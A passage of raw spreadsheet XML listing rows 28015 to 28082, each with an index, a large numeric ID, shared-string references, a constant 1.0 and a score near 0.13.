        <v>1.7515263E7</v>
      </c>
      <c r="C28015" s="2" t="s">
        <v>26921</v>
      </c>
      <c r="D28015" s="2">
        <v>1.0</v>
      </c>
      <c r="E28015" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28015" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="28016" ht="15.75" customHeight="1">
      <c r="A28016" s="1">
        <v>12235.0</v>
      </c>
      <c r="B28016" s="2">
        <v>2.7865678E7</v>
      </c>
      <c r="C28016" s="2" t="s">
        <v>26922</v>
      </c>
      <c r="D28016" s="2">
        <v>1.0</v>
      </c>
      <c r="E28016" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28016" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="28017" ht="15.75" customHeight="1">
      <c r="A28017" s="1">
        <v>16533.0</v>
      </c>
      <c r="B28017" s="2">
        <v>4.6736413E7</v>
      </c>
      <c r="C28017" s="2" t="s">
        <v>26923</v>
      </c>
      <c r="D28017" s="2">
        <v>1.0</v>
      </c>
      <c r="E28017" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28017" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="28018" ht="15.75" customHeight="1">
      <c r="A28018" s="1">
        <v>17727.0</v>
      </c>
      <c r="B28018" s="2">
        <v>5.0659648E7</v>
      </c>
      <c r="C28018" s="2" t="s">
        <v>26924</v>
      </c>
      <c r="D28018" s="2">
        <v>1.0</v>
      </c>
      <c r="E28018" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28018" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="28019" ht="15.75" customHeight="1">
      <c r="A28019" s="1">
        <v>20920.0</v>
      </c>
      <c r="B28019" s="2">
        <v>1.6381768E7</v>
      </c>
      <c r="C28019" s="2" t="s">
        <v>26925</v>
      </c>
      <c r="D28019" s="2">
        <v>1.0</v>
      </c>
      <c r="E28019" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28019" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="28020" ht="15.75" customHeight="1">
      <c r="A28020" s="1">
        <v>33289.0</v>
      </c>
      <c r="B28020" s="2">
        <v>7455918.0</v>
      </c>
      <c r="C28020" s="2" t="s">
        <v>26926</v>
      </c>
      <c r="D28020" s="2">
        <v>1.0</v>
      </c>
      <c r="E28020" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28020" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="28021" ht="15.75" customHeight="1">
      <c r="A28021" s="1">
        <v>33647.0</v>
      </c>
      <c r="B28021" s="2">
        <v>8398850.0</v>
      </c>
      <c r="C28021" s="2" t="s">
        <v>26927</v>
      </c>
      <c r="D28021" s="2">
        <v>1.0</v>
      </c>
      <c r="E28021" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28021" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="28022" ht="15.75" customHeight="1">
      <c r="A28022" s="1">
        <v>3057.0</v>
      </c>
      <c r="B28022" s="2">
        <v>3.6506302E7</v>
      </c>
      <c r="C28022" s="2" t="s">
        <v>26928</v>
      </c>
      <c r="D28022" s="2">
        <v>1.0</v>
      </c>
      <c r="E28022" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28022" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="28023" ht="15.75" customHeight="1">
      <c r="A28023" s="1">
        <v>24575.0</v>
      </c>
      <c r="B28023" s="2">
        <v>1.1320466E7</v>
      </c>
      <c r="C28023" s="2" t="s">
        <v>26929</v>
      </c>
      <c r="D28023" s="2">
        <v>1.0</v>
      </c>
      <c r="E28023" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28023" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="28024" ht="15.75" customHeight="1">
      <c r="A28024" s="1">
        <v>30929.0</v>
      </c>
      <c r="B28024" s="2">
        <v>4.7050584E7</v>
      </c>
      <c r="C28024" s="2" t="s">
        <v>26930</v>
      </c>
      <c r="D28024" s="2">
        <v>1.0</v>
      </c>
      <c r="E28024" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28024" s="2">
        <v>0.131578947368421</v>
      </c>
    </row>
    <row r="28025" ht="15.75" customHeight="1">
      <c r="A28025" s="1">
        <v>14500.0</v>
      </c>
      <c r="B28025" s="2">
        <v>3.9662301E7</v>
      </c>
      <c r="C28025" s="2" t="s">
        <v>26931</v>
      </c>
      <c r="D28025" s="2">
        <v>1.0</v>
      </c>
      <c r="E28025" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28025" s="2">
        <v>0.1315359477124184</v>
      </c>
    </row>
    <row r="28026" ht="15.75" customHeight="1">
      <c r="A28026" s="1">
        <v>19924.0</v>
      </c>
      <c r="B28026" s="2">
        <v>5.7432739E7</v>
      </c>
      <c r="C28026" s="2" t="s">
        <v>26932</v>
      </c>
      <c r="D28026" s="2">
        <v>1.0</v>
      </c>
      <c r="E28026" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28026" s="2">
        <v>0.1313932980599647</v>
      </c>
    </row>
    <row r="28027" ht="15.75" customHeight="1">
      <c r="A28027" s="1">
        <v>15805.0</v>
      </c>
      <c r="B28027" s="2">
        <v>4.4231347E7</v>
      </c>
      <c r="C28027" s="2" t="s">
        <v>26933</v>
      </c>
      <c r="D28027" s="2">
        <v>1.0</v>
      </c>
      <c r="E28027" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28027" s="2">
        <v>0.1313813813813814</v>
      </c>
    </row>
    <row r="28028" ht="15.75" customHeight="1">
      <c r="A28028" s="1">
        <v>18265.0</v>
      </c>
      <c r="B28028" s="2">
        <v>5.2194848E7</v>
      </c>
      <c r="C28028" s="2" t="s">
        <v>26934</v>
      </c>
      <c r="D28028" s="2">
        <v>1.0</v>
      </c>
      <c r="E28028" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28028" s="2">
        <v>0.1312260536398468</v>
      </c>
    </row>
    <row r="28029" ht="15.75" customHeight="1">
      <c r="A28029" s="1">
        <v>7734.0</v>
      </c>
      <c r="B28029" s="2">
        <v>5.2045999E7</v>
      </c>
      <c r="C28029" s="2" t="s">
        <v>26935</v>
      </c>
      <c r="D28029" s="2">
        <v>1.0</v>
      </c>
      <c r="E28029" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28029" s="2">
        <v>0.1312260536398467</v>
      </c>
    </row>
    <row r="28030" ht="15.75" customHeight="1">
      <c r="A28030" s="1">
        <v>8129.0</v>
      </c>
      <c r="B28030" s="2">
        <v>5.309936E7</v>
      </c>
      <c r="C28030" s="2" t="s">
        <v>26936</v>
      </c>
      <c r="D28030" s="2">
        <v>1.0</v>
      </c>
      <c r="E28030" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28030" s="2">
        <v>0.131076388888889</v>
      </c>
    </row>
    <row r="28031" ht="15.75" customHeight="1">
      <c r="A28031" s="1">
        <v>13040.0</v>
      </c>
      <c r="B28031" s="2">
        <v>3.3075642E7</v>
      </c>
      <c r="C28031" s="2" t="s">
        <v>26937</v>
      </c>
      <c r="D28031" s="2">
        <v>1.0</v>
      </c>
      <c r="E28031" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28031" s="2">
        <v>0.1310272536687631</v>
      </c>
    </row>
    <row r="28032" ht="15.75" customHeight="1">
      <c r="A28032" s="1">
        <v>32203.0</v>
      </c>
      <c r="B28032" s="2">
        <v>5.4797699E7</v>
      </c>
      <c r="C28032" s="2" t="s">
        <v>26938</v>
      </c>
      <c r="D28032" s="2">
        <v>1.0</v>
      </c>
      <c r="E28032" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28032" s="2">
        <v>0.1310272536687631</v>
      </c>
    </row>
    <row r="28033" ht="15.75" customHeight="1">
      <c r="A28033" s="1">
        <v>3640.0</v>
      </c>
      <c r="B28033" s="2">
        <v>3.9281967E7</v>
      </c>
      <c r="C28033" s="2" t="s">
        <v>26939</v>
      </c>
      <c r="D28033" s="2">
        <v>1.0</v>
      </c>
      <c r="E28033" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28033" s="2">
        <v>0.130952380952381</v>
      </c>
    </row>
    <row r="28034" ht="15.75" customHeight="1">
      <c r="A28034" s="1">
        <v>3289.0</v>
      </c>
      <c r="B28034" s="2">
        <v>3.7508205E7</v>
      </c>
      <c r="C28034" s="2" t="s">
        <v>26940</v>
      </c>
      <c r="D28034" s="2">
        <v>1.0</v>
      </c>
      <c r="E28034" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28034" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="28035" ht="15.75" customHeight="1">
      <c r="A28035" s="1">
        <v>8728.0</v>
      </c>
      <c r="B28035" s="2">
        <v>5.4518123E7</v>
      </c>
      <c r="C28035" s="2" t="s">
        <v>26941</v>
      </c>
      <c r="D28035" s="2">
        <v>1.0</v>
      </c>
      <c r="E28035" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28035" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="28036" ht="15.75" customHeight="1">
      <c r="A28036" s="1">
        <v>14830.0</v>
      </c>
      <c r="B28036" s="2">
        <v>4.1013393E7</v>
      </c>
      <c r="C28036" s="2" t="s">
        <v>26942</v>
      </c>
      <c r="D28036" s="2">
        <v>1.0</v>
      </c>
      <c r="E28036" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28036" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="28037" ht="15.75" customHeight="1">
      <c r="A28037" s="1">
        <v>19218.0</v>
      </c>
      <c r="B28037" s="2">
        <v>5.5014169E7</v>
      </c>
      <c r="C28037" s="2" t="s">
        <v>26943</v>
      </c>
      <c r="D28037" s="2">
        <v>1.0</v>
      </c>
      <c r="E28037" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28037" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="28038" ht="15.75" customHeight="1">
      <c r="A28038" s="1">
        <v>19323.0</v>
      </c>
      <c r="B28038" s="2">
        <v>5.5308181E7</v>
      </c>
      <c r="C28038" s="2" t="s">
        <v>26944</v>
      </c>
      <c r="D28038" s="2">
        <v>1.0</v>
      </c>
      <c r="E28038" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28038" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="28039" ht="15.75" customHeight="1">
      <c r="A28039" s="1">
        <v>31165.0</v>
      </c>
      <c r="B28039" s="2">
        <v>4903910.0</v>
      </c>
      <c r="C28039" s="2" t="s">
        <v>26945</v>
      </c>
      <c r="D28039" s="2">
        <v>1.0</v>
      </c>
      <c r="E28039" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28039" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="28040" ht="15.75" customHeight="1">
      <c r="A28040" s="1">
        <v>33092.0</v>
      </c>
      <c r="B28040" s="2">
        <v>6936556.0</v>
      </c>
      <c r="C28040" s="2" t="s">
        <v>26946</v>
      </c>
      <c r="D28040" s="2">
        <v>1.0</v>
      </c>
      <c r="E28040" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28040" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="28041" ht="15.75" customHeight="1">
      <c r="A28041" s="1">
        <v>13360.0</v>
      </c>
      <c r="B28041" s="2">
        <v>3.4781123E7</v>
      </c>
      <c r="C28041" s="2" t="s">
        <v>26947</v>
      </c>
      <c r="D28041" s="2">
        <v>1.0</v>
      </c>
      <c r="E28041" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28041" s="2">
        <v>0.1305555555555556</v>
      </c>
    </row>
    <row r="28042" ht="15.75" customHeight="1">
      <c r="A28042" s="1">
        <v>28637.0</v>
      </c>
      <c r="B28042" s="2">
        <v>2.7304328E7</v>
      </c>
      <c r="C28042" s="2" t="s">
        <v>26948</v>
      </c>
      <c r="D28042" s="2">
        <v>1.0</v>
      </c>
      <c r="E28042" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28042" s="2">
        <v>0.1305555555555556</v>
      </c>
    </row>
    <row r="28043" ht="15.75" customHeight="1">
      <c r="A28043" s="1">
        <v>3065.0</v>
      </c>
      <c r="B28043" s="2">
        <v>3.6510877E7</v>
      </c>
      <c r="C28043" s="2" t="s">
        <v>26949</v>
      </c>
      <c r="D28043" s="2">
        <v>1.0</v>
      </c>
      <c r="E28043" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28043" s="2">
        <v>0.1303418803418804</v>
      </c>
    </row>
    <row r="28044" ht="15.75" customHeight="1">
      <c r="A28044" s="1">
        <v>1128.0</v>
      </c>
      <c r="B28044" s="2">
        <v>2.4179551E7</v>
      </c>
      <c r="C28044" s="2" t="s">
        <v>26950</v>
      </c>
      <c r="D28044" s="2">
        <v>1.0</v>
      </c>
      <c r="E28044" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28044" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28045" ht="15.75" customHeight="1">
      <c r="A28045" s="1">
        <v>2119.0</v>
      </c>
      <c r="B28045" s="2">
        <v>3.1378792E7</v>
      </c>
      <c r="C28045" s="2" t="s">
        <v>26951</v>
      </c>
      <c r="D28045" s="2">
        <v>1.0</v>
      </c>
      <c r="E28045" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28045" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28046" ht="15.75" customHeight="1">
      <c r="A28046" s="1">
        <v>4084.0</v>
      </c>
      <c r="B28046" s="2">
        <v>4.1197946E7</v>
      </c>
      <c r="C28046" s="2" t="s">
        <v>26952</v>
      </c>
      <c r="D28046" s="2">
        <v>1.0</v>
      </c>
      <c r="E28046" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28046" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28047" ht="15.75" customHeight="1">
      <c r="A28047" s="1">
        <v>5104.0</v>
      </c>
      <c r="B28047" s="2">
        <v>4.4524855E7</v>
      </c>
      <c r="C28047" s="2" t="s">
        <v>26953</v>
      </c>
      <c r="D28047" s="2">
        <v>1.0</v>
      </c>
      <c r="E28047" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28047" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28048" ht="15.75" customHeight="1">
      <c r="A28048" s="1">
        <v>9438.0</v>
      </c>
      <c r="B28048" s="2">
        <v>5.580628E7</v>
      </c>
      <c r="C28048" s="2" t="s">
        <v>26954</v>
      </c>
      <c r="D28048" s="2">
        <v>1.0</v>
      </c>
      <c r="E28048" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28048" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28049" ht="15.75" customHeight="1">
      <c r="A28049" s="1">
        <v>12601.0</v>
      </c>
      <c r="B28049" s="2">
        <v>3.0083305E7</v>
      </c>
      <c r="C28049" s="2" t="s">
        <v>26955</v>
      </c>
      <c r="D28049" s="2">
        <v>1.0</v>
      </c>
      <c r="E28049" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28049" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28050" ht="15.75" customHeight="1">
      <c r="A28050" s="1">
        <v>13986.0</v>
      </c>
      <c r="B28050" s="2">
        <v>3.7356577E7</v>
      </c>
      <c r="C28050" s="2" t="s">
        <v>26956</v>
      </c>
      <c r="D28050" s="2">
        <v>1.0</v>
      </c>
      <c r="E28050" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28050" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28051" ht="15.75" customHeight="1">
      <c r="A28051" s="1">
        <v>14883.0</v>
      </c>
      <c r="B28051" s="2">
        <v>4.1115831E7</v>
      </c>
      <c r="C28051" s="2" t="s">
        <v>26957</v>
      </c>
      <c r="D28051" s="2">
        <v>1.0</v>
      </c>
      <c r="E28051" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28051" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28052" ht="15.75" customHeight="1">
      <c r="A28052" s="1">
        <v>15702.0</v>
      </c>
      <c r="B28052" s="2">
        <v>4.3938715E7</v>
      </c>
      <c r="C28052" s="2" t="s">
        <v>26958</v>
      </c>
      <c r="D28052" s="2">
        <v>1.0</v>
      </c>
      <c r="E28052" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28052" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28053" ht="15.75" customHeight="1">
      <c r="A28053" s="1">
        <v>15999.0</v>
      </c>
      <c r="B28053" s="2">
        <v>4.4967385E7</v>
      </c>
      <c r="C28053" s="2" t="s">
        <v>26959</v>
      </c>
      <c r="D28053" s="2">
        <v>1.0</v>
      </c>
      <c r="E28053" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28053" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28054" ht="15.75" customHeight="1">
      <c r="A28054" s="1">
        <v>17034.0</v>
      </c>
      <c r="B28054" s="2">
        <v>4.8505919E7</v>
      </c>
      <c r="C28054" s="2" t="s">
        <v>26960</v>
      </c>
      <c r="D28054" s="2">
        <v>1.0</v>
      </c>
      <c r="E28054" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28054" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28055" ht="15.75" customHeight="1">
      <c r="A28055" s="1">
        <v>20165.0</v>
      </c>
      <c r="B28055" s="2">
        <v>1.0385025E7</v>
      </c>
      <c r="C28055" s="2" t="s">
        <v>26961</v>
      </c>
      <c r="D28055" s="2">
        <v>1.0</v>
      </c>
      <c r="E28055" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28055" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28056" ht="15.75" customHeight="1">
      <c r="A28056" s="1">
        <v>21771.0</v>
      </c>
      <c r="B28056" s="2">
        <v>2.6391015E7</v>
      </c>
      <c r="C28056" s="2" t="s">
        <v>26962</v>
      </c>
      <c r="D28056" s="2">
        <v>1.0</v>
      </c>
      <c r="E28056" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28056" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28057" ht="15.75" customHeight="1">
      <c r="A28057" s="1">
        <v>23888.0</v>
      </c>
      <c r="B28057" s="2">
        <v>8409850.0</v>
      </c>
      <c r="C28057" s="2" t="s">
        <v>26963</v>
      </c>
      <c r="D28057" s="2">
        <v>1.0</v>
      </c>
      <c r="E28057" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28057" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28058" ht="15.75" customHeight="1">
      <c r="A28058" s="1">
        <v>23899.0</v>
      </c>
      <c r="B28058" s="2">
        <v>8466979.0</v>
      </c>
      <c r="C28058" s="2" t="s">
        <v>26964</v>
      </c>
      <c r="D28058" s="2">
        <v>1.0</v>
      </c>
      <c r="E28058" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28058" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28059" ht="15.75" customHeight="1">
      <c r="A28059" s="1">
        <v>24210.0</v>
      </c>
      <c r="B28059" s="2">
        <v>1.0385024E7</v>
      </c>
      <c r="C28059" s="2" t="s">
        <v>26961</v>
      </c>
      <c r="D28059" s="2">
        <v>1.0</v>
      </c>
      <c r="E28059" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28059" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28060" ht="15.75" customHeight="1">
      <c r="A28060" s="1">
        <v>24772.0</v>
      </c>
      <c r="B28060" s="2">
        <v>1.1866925E7</v>
      </c>
      <c r="C28060" s="2" t="s">
        <v>26965</v>
      </c>
      <c r="D28060" s="2">
        <v>1.0</v>
      </c>
      <c r="E28060" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28060" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28061" ht="15.75" customHeight="1">
      <c r="A28061" s="1">
        <v>25220.0</v>
      </c>
      <c r="B28061" s="2">
        <v>1.3308406E7</v>
      </c>
      <c r="C28061" s="2" t="s">
        <v>26966</v>
      </c>
      <c r="D28061" s="2">
        <v>1.0</v>
      </c>
      <c r="E28061" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28061" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28062" ht="15.75" customHeight="1">
      <c r="A28062" s="1">
        <v>25955.0</v>
      </c>
      <c r="B28062" s="2">
        <v>1.5255516E7</v>
      </c>
      <c r="C28062" s="2" t="s">
        <v>26967</v>
      </c>
      <c r="D28062" s="2">
        <v>1.0</v>
      </c>
      <c r="E28062" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28062" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28063" ht="15.75" customHeight="1">
      <c r="A28063" s="1">
        <v>27506.0</v>
      </c>
      <c r="B28063" s="2">
        <v>2.210788E7</v>
      </c>
      <c r="C28063" s="2" t="s">
        <v>26968</v>
      </c>
      <c r="D28063" s="2">
        <v>1.0</v>
      </c>
      <c r="E28063" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28063" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28064" ht="15.75" customHeight="1">
      <c r="A28064" s="1">
        <v>28544.0</v>
      </c>
      <c r="B28064" s="2">
        <v>2.6858152E7</v>
      </c>
      <c r="C28064" s="2" t="s">
        <v>26969</v>
      </c>
      <c r="D28064" s="2">
        <v>1.0</v>
      </c>
      <c r="E28064" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28064" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28065" ht="15.75" customHeight="1">
      <c r="A28065" s="1">
        <v>29100.0</v>
      </c>
      <c r="B28065" s="2">
        <v>3.0392416E7</v>
      </c>
      <c r="C28065" s="2" t="s">
        <v>26970</v>
      </c>
      <c r="D28065" s="2">
        <v>1.0</v>
      </c>
      <c r="E28065" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28065" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28066" ht="15.75" customHeight="1">
      <c r="A28066" s="1">
        <v>29136.0</v>
      </c>
      <c r="B28066" s="2">
        <v>3.0543941E7</v>
      </c>
      <c r="C28066" s="2" t="s">
        <v>26971</v>
      </c>
      <c r="D28066" s="2">
        <v>1.0</v>
      </c>
      <c r="E28066" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28066" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28067" ht="15.75" customHeight="1">
      <c r="A28067" s="1">
        <v>32717.0</v>
      </c>
      <c r="B28067" s="2">
        <v>5971693.0</v>
      </c>
      <c r="C28067" s="2" t="s">
        <v>26972</v>
      </c>
      <c r="D28067" s="2">
        <v>1.0</v>
      </c>
      <c r="E28067" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28067" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28068" ht="15.75" customHeight="1">
      <c r="A28068" s="1">
        <v>33664.0</v>
      </c>
      <c r="B28068" s="2">
        <v>8409849.0</v>
      </c>
      <c r="C28068" s="2" t="s">
        <v>26963</v>
      </c>
      <c r="D28068" s="2">
        <v>1.0</v>
      </c>
      <c r="E28068" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28068" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28069" ht="15.75" customHeight="1">
      <c r="A28069" s="1">
        <v>33700.0</v>
      </c>
      <c r="B28069" s="2">
        <v>8466978.0</v>
      </c>
      <c r="C28069" s="2" t="s">
        <v>26964</v>
      </c>
      <c r="D28069" s="2">
        <v>1.0</v>
      </c>
      <c r="E28069" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28069" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="28070" ht="15.75" customHeight="1">
      <c r="A28070" s="1">
        <v>6136.0</v>
      </c>
      <c r="B28070" s="2">
        <v>4.781831E7</v>
      </c>
      <c r="C28070" s="2" t="s">
        <v>26973</v>
      </c>
      <c r="D28070" s="2">
        <v>1.0</v>
      </c>
      <c r="E28070" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28070" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="28071" ht="15.75" customHeight="1">
      <c r="A28071" s="1">
        <v>19914.0</v>
      </c>
      <c r="B28071" s="2">
        <v>5.7371261E7</v>
      </c>
      <c r="C28071" s="2" t="s">
        <v>26974</v>
      </c>
      <c r="D28071" s="2">
        <v>1.0</v>
      </c>
      <c r="E28071" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28071" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="28072" ht="15.75" customHeight="1">
      <c r="A28072" s="1">
        <v>23621.0</v>
      </c>
      <c r="B28072" s="2">
        <v>6514737.0</v>
      </c>
      <c r="C28072" s="2" t="s">
        <v>26975</v>
      </c>
      <c r="D28072" s="2">
        <v>1.0</v>
      </c>
      <c r="E28072" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28072" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="28073" ht="15.75" customHeight="1">
      <c r="A28073" s="1">
        <v>1834.0</v>
      </c>
      <c r="B28073" s="2">
        <v>2.9351772E7</v>
      </c>
      <c r="C28073" s="2" t="s">
        <v>26976</v>
      </c>
      <c r="D28073" s="2">
        <v>1.0</v>
      </c>
      <c r="E28073" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28073" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="28074" ht="15.75" customHeight="1">
      <c r="A28074" s="1">
        <v>17031.0</v>
      </c>
      <c r="B28074" s="2">
        <v>4.8487662E7</v>
      </c>
      <c r="C28074" s="2" t="s">
        <v>26977</v>
      </c>
      <c r="D28074" s="2">
        <v>1.0</v>
      </c>
      <c r="E28074" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28074" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="28075" ht="15.75" customHeight="1">
      <c r="A28075" s="1">
        <v>20177.0</v>
      </c>
      <c r="B28075" s="2">
        <v>1.045378E7</v>
      </c>
      <c r="C28075" s="2" t="s">
        <v>26978</v>
      </c>
      <c r="D28075" s="2">
        <v>1.0</v>
      </c>
      <c r="E28075" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28075" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="28076" ht="15.75" customHeight="1">
      <c r="A28076" s="1">
        <v>20926.0</v>
      </c>
      <c r="B28076" s="2">
        <v>1.6397891E7</v>
      </c>
      <c r="C28076" s="2" t="s">
        <v>26979</v>
      </c>
      <c r="D28076" s="2">
        <v>1.0</v>
      </c>
      <c r="E28076" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28076" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="28077" ht="15.75" customHeight="1">
      <c r="A28077" s="1">
        <v>2209.0</v>
      </c>
      <c r="B28077" s="2">
        <v>3.2073931E7</v>
      </c>
      <c r="C28077" s="2" t="s">
        <v>26980</v>
      </c>
      <c r="D28077" s="2">
        <v>1.0</v>
      </c>
      <c r="E28077" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28077" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="28078" ht="15.75" customHeight="1">
      <c r="A28078" s="1">
        <v>9636.0</v>
      </c>
      <c r="B28078" s="2">
        <v>5.6236698E7</v>
      </c>
      <c r="C28078" s="2" t="s">
        <v>26981</v>
      </c>
      <c r="D28078" s="2">
        <v>1.0</v>
      </c>
      <c r="E28078" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28078" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="28079" ht="15.75" customHeight="1">
      <c r="A28079" s="1">
        <v>18261.0</v>
      </c>
      <c r="B28079" s="2">
        <v>5.2188236E7</v>
      </c>
      <c r="C28079" s="2" t="s">
        <v>26982</v>
      </c>
      <c r="D28079" s="2">
        <v>1.0</v>
      </c>
      <c r="E28079" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28079" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="28080" ht="15.75" customHeight="1">
      <c r="A28080" s="1">
        <v>235.0</v>
      </c>
      <c r="B28080" s="2">
        <v>1.4759899E7</v>
      </c>
      <c r="C28080" s="2" t="s">
        <v>26983</v>
      </c>
      <c r="D28080" s="2">
        <v>1.0</v>
      </c>
      <c r="E28080" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28080" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="28081" ht="15.75" customHeight="1">
      <c r="A28081" s="1">
        <v>14704.0</v>
      </c>
      <c r="B28081" s="2">
        <v>4.0581398E7</v>
      </c>
      <c r="C28081" s="2" t="s">
        <v>26984</v>
      </c>
      <c r="D28081" s="2">
        <v>1.0</v>
      </c>
      <c r="E28081" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28081" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="28082" ht="15.75" customHeight="1">
      <c r="A28082" s="1">
        <v>18981.0</v>
      </c>
      <c r="B28082" s="2">
        <v>5.4385597E7</v>
      </c>
